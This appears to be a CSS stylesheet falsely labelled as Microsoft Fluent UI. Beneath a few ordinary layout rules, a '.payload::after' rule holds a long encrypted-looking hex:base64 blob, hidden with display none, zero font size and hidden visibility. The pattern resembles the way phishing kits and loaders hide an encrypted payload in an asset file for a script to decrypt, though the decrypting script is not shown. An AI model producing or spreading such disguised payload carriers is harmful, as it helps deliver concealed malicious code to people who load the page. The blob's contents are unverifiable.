
/* Microsoft Fluent UI – dynamic style injection */
body {
  font-family: "Segoe UI", system-ui, sans-serif;
  background-color: #ffffff;
  margin: 0;
  padding: 0;
}

.container {
  max-width: 1080px;
  margin: auto;
  padding: 24px;
}

.payload::after {
  content: "fd659f1398bcbde977eed05e09e241f1:eifTTtDp2pTLzQe+vSEjZhHkyErJI8TqPr0JNb8tSghRmg/nMxHCPrQvzxacaJKSTqjLAMXl8OfHWKF9EhVpmxvRflzA6z0sgGJp9jcVw4QBWjsW2d1b75bqRxop3lN3VwFFlaBiAub8Z/1kE9KnyOdZs2ykTdD4u5jlOtheXTbw3SLbkNEmmUt98ImHC6/T4OlGmYE+6DCgNJIVtsGQXGFIqePk0JoP3JM7DVENvSoUHCx57xfrcdhxD7Up1K4CQPi4y3fWho+vamzR+PvX+8xM1HkpRWTPc6mZxLkRx78t2+G5Geha2o4F1K8vZGnxlWqVmhD0q1uxla82KfAnkslYHmrk2fUeq1Fqv5dYPrPBqSCiJQ/9GFZOnSYcz9StnZj2O5eIuCzulwie5SUwupBkLNEYDg+XlMpihXKUfSA07ZYHbu8XCOtprAAXaApw94w1piGNhRKjGboi5DNqC03kgGBh/TXaeNq0WuQP5i0=";
  display: none;
  font-size: 0;
  visibility: hidden;
}
